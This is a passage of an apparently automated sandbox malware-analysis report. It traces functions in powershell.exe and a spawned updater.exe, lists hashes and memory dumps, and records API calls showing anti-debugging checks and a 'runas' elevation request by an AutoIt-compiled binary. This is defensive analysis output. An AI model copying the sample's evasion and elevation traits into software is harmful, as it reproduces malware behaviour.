Function 00007FFAAB526B96 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6248036c9abb08a0f20609fee05a3a194eddafbade7ebc260d6b54376e62f238
Instruction ID: 4f16206e4c78bc11427a3bbe8645d0185425faaa3b35ba415d441bd895bb7d99
Opcode Fuzzy Hash: 6248036c9abb08a0f20609fee05a3a194eddafbade7ebc260d6b54376e62f238
Instruction Fuzzy Hash: D3113872A0F68B8FF754EB9C80905787785EF69350F5440BED14EC71A3CD189C498391

Function 00007FFAAB453A05 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2541245826.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab450000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: 44ffee1d2672ab4cf94c5d5dd05b6f32c930f2de29b40ec2628ea3f34322155d
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 4D01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10066DE58AC3665DB36E881CB45

Function 00007FFAAB523D6A Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46c89986cf828a638fc5ff069adc549655d9d369b4d08f65e4bd8e524bf86555
Instruction ID: 6d29e15188251ef644b11da990ccac267e2a3130e259f09cc8880cc494194f6b
Opcode Fuzzy Hash: 46c89986cf828a638fc5ff069adc549655d9d369b4d08f65e4bd8e524bf86555
Instruction Fuzzy Hash: D3F0C25455F3C59FD743A7389C206A23FE8AF83215B1845FFE0CAC61A3D9185C0AC396

Function 00007FFAAB5204D8 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2542591909.00007FFAAB520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab520000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9cd5878f980f56c83a04a95448d4ceffbed6a2c0f92754e7c5bcd85fa1c7b8c
Instruction ID: 36266db524473ab3c1045cec88bde2b987f21bcbaaa15a5d71e6061749c2c55e
Opcode Fuzzy Hash: c9cd5878f980f56c83a04a95448d4ceffbed6a2c0f92754e7c5bcd85fa1c7b8c
Instruction Fuzzy Hash: 30E0D833F0F96B4EEBA5B69C64595F966C5EF5926170841B7E90EC3192EC049C1443C1

Non-executed Functions

Function 00007FFAAB458AFA Relevance: 7.8, Strings: 6, Instructions: 342COMMON

Download Yara Rule

Strings

M_^, xrefs: 00007FFAAB458C7A
M_^, xrefs: 00007FFAAB458B6A
M_^, xrefs: 00007FFAAB458B7A
M_^, xrefs: 00007FFAAB458C6A
M_^, xrefs: 00007FFAAB458C3A
M_^, xrefs: 00007FFAAB458AFA

Memory Dump Source

Source File: 0000000E.00000002.2541245826.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab450000_powershell.jbxd

Similarity

API ID:
String ID: M_^$M_^$M_^$M_^$M_^$M_^
API String ID: 0-1070628180
Opcode ID: b005d718000f77915b9eeaa178239e5f628f9294e1e560038ecff4f8ddf94242
Instruction ID: c1008072fb961ca7db9691ff01f83ba1e68702d93f49715bf9e0eb527b07ef55
Opcode Fuzzy Hash: b005d718000f77915b9eeaa178239e5f628f9294e1e560038ecff4f8ddf94242
Instruction Fuzzy Hash: CBB175A6A0EBC38FD306D71848665947F64EF23254B0D42FBC4DD8F0E3F91929198766

Function 00007FFAAB450830 Relevance: 7.6, Strings: 6, Instructions: 128COMMON

Download Yara Rule

Strings

/P, xrefs: 00007FFAAB450851
-P, xrefs: 00007FFAAB4508D9
P/P, xrefs: 00007FFAAB450889
(0P, xrefs: 00007FFAAB4508B9
8,P, xrefs: 00007FFAAB450899
H1P, xrefs: 00007FFAAB450841

Memory Dump Source

Source File: 0000000E.00000002.2541245826.00007FFAAB450000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB450000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ffaab450000_powershell.jbxd

Similarity

API ID:
String ID: (0P$8,P$H1P$P/P$-P$/P
API String ID: 0-1115123650
Opcode ID: c3a6acdfda2afbecfbb0da02ae40340cec7fc700cbfff83b1a9cc0022ec9a5e5
Instruction ID: f06ba38f753843117d2b2242ec22834d2a5ec5d7ccf2f01e99524a27c46982e4
Opcode Fuzzy Hash: c3a6acdfda2afbecfbb0da02ae40340cec7fc700cbfff83b1a9cc0022ec9a5e5
Instruction Fuzzy Hash: 4931C58780FAC16FF61A82992C255A11FA4FFA3790B0881FFE0CC9A5EB94145D0D83D1

Analysis Process: powershell.exePID: 7844, Parent PID: 7720COMMON

Executed Functions

Function 00007FFAAB533F0E Relevance: 3.8, Strings: 2, Instructions: 1273COMMON

Download Yara Rule

Strings

B, xrefs: 00007FFAAB534912
63, xrefs: 00007FFAAB5340E3

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID: 63$B
API String ID: 0-3125633593
Opcode ID: e189ebef50f8e02361ce5102ba9c67875896185c0de7dda34c6d2d87780a0479
Instruction ID: 56233a3941329a0ec7eb04bfe1410951ac9de2b3f6319bb1e09671b4efd83f70
Opcode Fuzzy Hash: e189ebef50f8e02361ce5102ba9c67875896185c0de7dda34c6d2d87780a0479
Instruction Fuzzy Hash: 2F821A62A0EBCA8FE795DB2888655747BE5EF57350B1840FAD04EC72E3D9289C49C3C1

Function 00007FFAAB535042 Relevance: 2.0, Strings: 1, Instructions: 726COMMON

Download Yara Rule

Strings

?_L, xrefs: 00007FFAAB535561

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID: ?_L
API String ID: 0-1176629243
Opcode ID: e78f60fffb01e91347553801d40662f8b57c8763b44c0e52d328746122e77eb4
Instruction ID: cf12a015eba5625b3ebc462c70a9d1888b4e648285ef5853d00fe789462b74c9
Opcode Fuzzy Hash: e78f60fffb01e91347553801d40662f8b57c8763b44c0e52d328746122e77eb4
Instruction Fuzzy Hash: F732F6B290DB8A8FE795DB28D4699687BE1EF56340B1840FDD04EC72D3D929AC49C3C1

Function 00007FFAAB5328DA Relevance: 1.5, Strings: 1, Instructions: 222COMMON

Download Yara Rule

Strings

63, xrefs: 00007FFAAB532966

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID: 63
API String ID: 0-3819469774
Opcode ID: dd427cabf116cec13f0f1f15759b8f90dd93561ac162e3b6da41088962572d5e
Instruction ID: f591ca468d95614f852382acd760a933c3b7ccb9f8ee68eb5bc53699ecfa3dd6
Opcode Fuzzy Hash: dd427cabf116cec13f0f1f15759b8f90dd93561ac162e3b6da41088962572d5e
Instruction Fuzzy Hash: C8516A63B1DF4A4FE7A4976CA8616B477D5EF96260B0841BED04FC72D3DC05AC0A86C1

Function 00007FFAAB532928 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

63, xrefs: 00007FFAAB532966

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID: 63
API String ID: 0-3819469774
Opcode ID: d0711cb950c16eb763fbb0d3b0ad81d2fe0da797bbf64a3532c067928280f7aa
Instruction ID: 85f7b00f6d8d2ec34a123ba47a09f3691e28114180f1278c683b7dfcf44fa9e0
Opcode Fuzzy Hash: d0711cb950c16eb763fbb0d3b0ad81d2fe0da797bbf64a3532c067928280f7aa
Instruction Fuzzy Hash: AA317A53F1EF8B4FE3A4A76C9871174A6C9EF96260B1881BAD05FC72D3DC09AC4946C1

Function 00007FFAAB53408A Relevance: 1.3, Strings: 1, Instructions: 89COMMON

Download Yara Rule

Strings

63, xrefs: 00007FFAAB5340E3

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID: 63
API String ID: 0-3819469774
Opcode ID: 6800c3da1e85a3907e6a0bff9e6b5c30e9e6c17f837393b9d639e9ea05984179
Instruction ID: 1dc3eabcb9ca86eb61e3e785e4ecac6beff41d741ed3bb1a70eee6885e3aa6bd
Opcode Fuzzy Hash: 6800c3da1e85a3907e6a0bff9e6b5c30e9e6c17f837393b9d639e9ea05984179
Instruction Fuzzy Hash: 55214D63B0EE478FF3A5D7289872574A6D5EF56290B4885B9D00FC72E3CD28AC0842C1

Function 00007FFAAB53372D Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b8d93d60562b0210ecb871281420a2b804baf7fac36c37749746c24378248d7
Instruction ID: bcae44fca4dce8d4b8daa3bfc2d96f95c74d44cd164199ecc7a10130c3a2b737
Opcode Fuzzy Hash: 3b8d93d60562b0210ecb871281420a2b804baf7fac36c37749746c24378248d7
Instruction Fuzzy Hash: FE113AB3B0D6868FE315A36CD8665B8BBE4FF86260B1440FAE04EC71A3E8056C0543C2

Function 00007FFAAB463A45 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000010.00000002.2698297419.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab460000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction ID: aa8341f1a54642d1380ff709674430f82273fcf79b3f50cb901fd0bd245b0dda
Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
Instruction Fuzzy Hash: CE01677111CB0C8FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665DA36E881CB45

Non-executed Functions

Function 00007FFAAB535881 Relevance: 3.1, Strings: 2, Instructions: 578COMMON

Download Yara Rule

Strings

63, xrefs: 00007FFAAB535ABA
63, xrefs: 00007FFAAB535A6A

Memory Dump Source

Source File: 00000010.00000002.2699364993.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab530000_powershell.jbxd

Similarity

API ID:
String ID: 63$63
API String ID: 0-2024540123
Opcode ID: 6f8507c0d110b0a3774f03e9344b47cbeb5b88a88418d5aa167f0cb67b6e8dae
Instruction ID: c3d210d5c51d0080738090e82cb604baf5c19a41403ffe3c68bb36b40ff89ba1
Opcode Fuzzy Hash: 6f8507c0d110b0a3774f03e9344b47cbeb5b88a88418d5aa167f0cb67b6e8dae
Instruction Fuzzy Hash: B802E66290E7C64FE3579738A8695A47FA5EF53264B0D41FBD08DCB1E3DA08580EC392

Function 00007FFAAB460865 Relevance: 8.9, Strings: 7, Instructions: 111COMMON

Download Yara Rule

Strings

P/P, xrefs: 00007FFAAB4608D9
/P, xrefs: 00007FFAAB4608A9
p0P, xrefs: 00007FFAAB4608C9
H1P, xrefs: 00007FFAAB460899
8,P, xrefs: 00007FFAAB4608E9
-P, xrefs: 00007FFAAB460929
(0P, xrefs: 00007FFAAB460909

Memory Dump Source

Source File: 00000010.00000002.2698297419.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab460000_powershell.jbxd

Similarity

API ID:
String ID: (0P$8,P$H1P$P/P$p0P$-P$/P
API String ID: 0-1701350710
Opcode ID: 78a42600023c07da6c3ea2635a311f836e5aa7c4ee346e268076b21990f51c2d
Instruction ID: eb02140a336141f68ae5a6ad82f8d0ecb8a77df14cd5afaa00fe49fb71091d43
Opcode Fuzzy Hash: 78a42600023c07da6c3ea2635a311f836e5aa7c4ee346e268076b21990f51c2d
Instruction Fuzzy Hash: FC31928380F7C15FF61A87982C751699FE5FF93680B1880FBE0CC962EBA8549D0D82D1

Function 00007FFAAB46081A Relevance: 6.3, Strings: 5, Instructions: 99COMMON

Download Yara Rule

Strings

P/P, xrefs: 00007FFAAB4608D9
p0P, xrefs: 00007FFAAB4608C9
8,P, xrefs: 00007FFAAB4608E9
-P, xrefs: 00007FFAAB460929
(0P, xrefs: 00007FFAAB460909

Memory Dump Source

Source File: 00000010.00000002.2698297419.00007FFAAB460000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB460000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ffaab460000_powershell.jbxd

Similarity

API ID:
String ID: (0P$8,P$P/P$p0P$-P
API String ID: 0-1181810038
Opcode ID: fd49026263b0b51ae0128d69ae86b5fae21e0a94a13c15241300656c382adff5
Instruction ID: c7bb01a55eb6a9413fe9b595011aae7e7c84eb385ddf02ebef512709884e1b0e
Opcode Fuzzy Hash: fd49026263b0b51ae0128d69ae86b5fae21e0a94a13c15241300656c382adff5
Instruction Fuzzy Hash: AE21AC9380F7C15FF66993982CB61A59ED5FF97790B1880FBE0CC462EBA8549D0D82C1

Analysis Process: updater.exePID: 2024, Parent PID: 7844COMMON

Execution Graph

Execution Coverage:	4.3%
Dynamic/Decrypted Code Coverage:	85.2%
Signature Coverage:	2.6%
Total number of Nodes:	2000
Total number of Limit Nodes:	48

Executed Functions

Function 017B21C5 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 186
registrystringlibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 017B21E0
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 017B21FE
RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 017B221C
RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 017B223A
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,017B22C9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 017B2283
RegQueryValueExA.ADVAPI32(?,017B2445,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,017B22C9,?,80000001), ref: 017B22A1
RegCloseKey.ADVAPI32(?,017B22D0,00000000,00000000,00000005,00000000,017B22C9,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 017B22C3
lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 017B22E0
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 017B22ED
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 017B22F3
lstrlen.KERNEL32(00000000), ref: 017B231E
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 017B2373
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B2383
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 017B23AF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B23BF
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B23E9
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B23F9

Strings

Software\Borland\Delphi\Locales, xrefs: 017B2230
Software\Borland\Locales, xrefs: 017B21F4, 017B2212

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1759228003-2375825460
Opcode ID: 897328ef6de3dadaade402a3f5424f484c3f94068e4f94318330a2d16bc5e788
Instruction ID: 9dff5c6488858acc152f34aaae0d9578924c98c0171bff954936fa10b036990a
Opcode Fuzzy Hash: 897328ef6de3dadaade402a3f5424f484c3f94068e4f94318330a2d16bc5e788
Instruction Fuzzy Hash: 5A616471E0420E7EEB21DAE8CC85FEFF7BC9B58300F4041A1A614E7585D7B8EA458B61

Function 00BC5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BC526C
IsDebuggerPresent.KERNEL32 ref: 00BC527E
GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00BC52E6

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

Part of subcall function 00BBBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BBBC07

SetCurrentDirectoryW.KERNEL32(?), ref: 00BC5366
MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00C00B2E
SetCurrentDirectoryW.KERNEL32(?), ref: 00C00B66
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00C66D10), ref: 00C00BE9
ShellExecuteW.SHELL32(00000000), ref: 00C00BF0

Part of subcall function 00BC514C: GetSysColorBrush.USER32(0000000F), ref: 00BC5156
Part of subcall function 00BC514C: LoadCursorW.USER32(00000000,00007F00), ref: 00BC5165
Part of subcall function 00BC514C: LoadIconW.USER32(00000063), ref: 00BC517C
Part of subcall function 00BC514C: LoadIconW.USER32(000000A4), ref: 00BC518E
Part of subcall function 00BC514C: LoadIconW.USER32(000000A2), ref: 00BC51A0
Part of subcall function 00BC514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BC51C6
Part of subcall function 00BC514C: RegisterClassExW.USER32(?), ref: 00BC521C

Part of subcall function 00BC50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BC5109
Part of subcall function 00BC50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BC512A
Part of subcall function 00BC50DB: ShowWindow.USER32(00000000), ref: 00BC513E
Part of subcall function 00BC50DB: ShowWindow.USER32(00000000), ref: 00BC5147

Part of subcall function 00BC59D3: _memset.LIBCMT ref: 00BC59F9
Part of subcall function 00BC59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BC5A9E

Strings

runas, xrefs: 00C00BE4
It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00C00B28
AutoIt, xrefs: 00C00B23

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
API String ID: 529118366-2030392706
Opcode ID: ae2a8e8173cb158b2a10f15293040521e50b455c1f38c355c9f0a5eaf4cebe87
Instruction ID: 78928df49844fc47e8269fb5c3b255dfbaf5dd51195363d721060bfdf3ba2cd7
Opcode Fuzzy Hash: ae2a8e8173cb158b2a10f15293040521e50b455c1f38c355c9f0a5eaf4cebe87
Instruction Fuzzy Hash: AE51E37094824CEACF21ABB49C45FEE7BB8AB46340F2041EDF565721A3CAB05685CB21

Function 017B22CF Relevance: 15.1, APIs: 10, Instructions: 102
stringlibrarythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 017B22E0
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 017B22ED
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 017B22F3
lstrlen.KERNEL32(00000000), ref: 017B231E
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 017B2373
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B2383
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 017B23AF
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B23BF
lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B23E9
LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 017B23F9

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID:
API String ID: 1599918012-0
Opcode ID: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
Instruction ID: 0136509e93e2d9671b3e0bb7fe3bd39eceac248b92131f76349ad19803f581bd
Opcode Fuzzy Hash: 9761e91035f57e01ffaef065c1ac89d12249611f77cd6e926a4d7ebbac4f4515
Instruction Fuzzy Hash: 4E317371E0420A7EEB25DAE8C888FEFF7BC9B58300F404191A159E7545D7B8EA85CB50

Function 00BC5D13 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00BC5D40

Part of subcall function 00BC1821: _memmove.LIBCMT ref: 00BC185B

GetCurrentProcess.KERNEL32(?,00C40A18,00000000,00000000,?), ref: 00BC5E07
IsWow64Process.KERNEL32(00000000), ref: 00BC5E0E
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00BC5E54
FreeLibrary.KERNEL32(00000000), ref: 00BC5E5F
GetSystemInfo.KERNEL32(00000000), ref: 00BC5E90
GetSystemInfo.KERNEL32(00000000), ref: 00BC5E9C

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: fd7351f8076e893456e29c234dba0e0ea9e95eafaed7f9cbba4f304ddd448531
Instruction ID: 8580192d92067429069796fb2337c304b375f22c123a7d4efc9d9a82bf5a7fae
Opcode Fuzzy Hash: fd7351f8076e893456e29c234dba0e0ea9e95eafaed7f9cbba4f304ddd448531
Instruction Fuzzy Hash: F091B831549BC1DEC731CB788450AABFFE5AF36300B984A9ED0D797641D230B688D769

Function 00BB1663 Relevance: 7.9, APIs: 5, Instructions: 379COMMON

Download Yara Rule

APIs

Part of subcall function 00BB29E2: GetWindowLongW.USER32(?,000000EB), ref: 00BB29F3

DefDlgProcW.USER32(?,?,?,?,?), ref: 00BB1DD6
GetSysColor.USER32(0000000F), ref: 00BB1E2A
SetBkColor.GDI32(?,00000000), ref: 00BB1E3D

Part of subcall function 00BB166C: DefDlgProcW.USER32(?,00000020,?), ref: 00BB16B4

Memory Dump Source

Source File: 0000001B.00000002.1700622314.0000000000BB1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00BB0000, based on PE: true

Associated: 0000001B.00000002.1700583110.0000000000BB0000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C40000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700774290.0000000000C66000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700886981.0000000000C70000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 0000001B.00000002.1700936638.0000000000C79000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_bb0000_updater.jbxd

Similarity

API ID: ColorProc$LongWindow
String ID:
API String ID: 3744519093-0
Opcode ID: 2353a5a2d95cb7132f2a640360231e90496e0ffbf6bc59a2d8dfa9f07def8d52
Instruction ID: e60271dedd886acbf3d07835adc929c78865e3055ac6862f16feb781c41aef80
Opcode Fuzzy Hash: 2353a5a2d95cb7132f2a640360231e90496e0ffbf6bc59a2d8dfa9f07def8d52
Instruction Fuzzy Hash: 46A17870119448BBDB2CAB6E8CA9FFF35DDDB42301FA04AA9F402D5191CBA0DD01D276

Function 017B46BD Relevance: 6.0, APIs: 4, Instructions: 37timefileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?), ref: 017B46D8
FindClose.KERNEL32(00000000,00000000,?), ref: 017B46E3
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 017B46FC
FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 017B470D

Memory Dump Source

Source File: 0000001B.00000002.1703835939.00000000017AB000.00000040.00000020.00020000.00000000.sdmp, Offset: 017AB000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_17ab000_updater.jbxd

Similarity

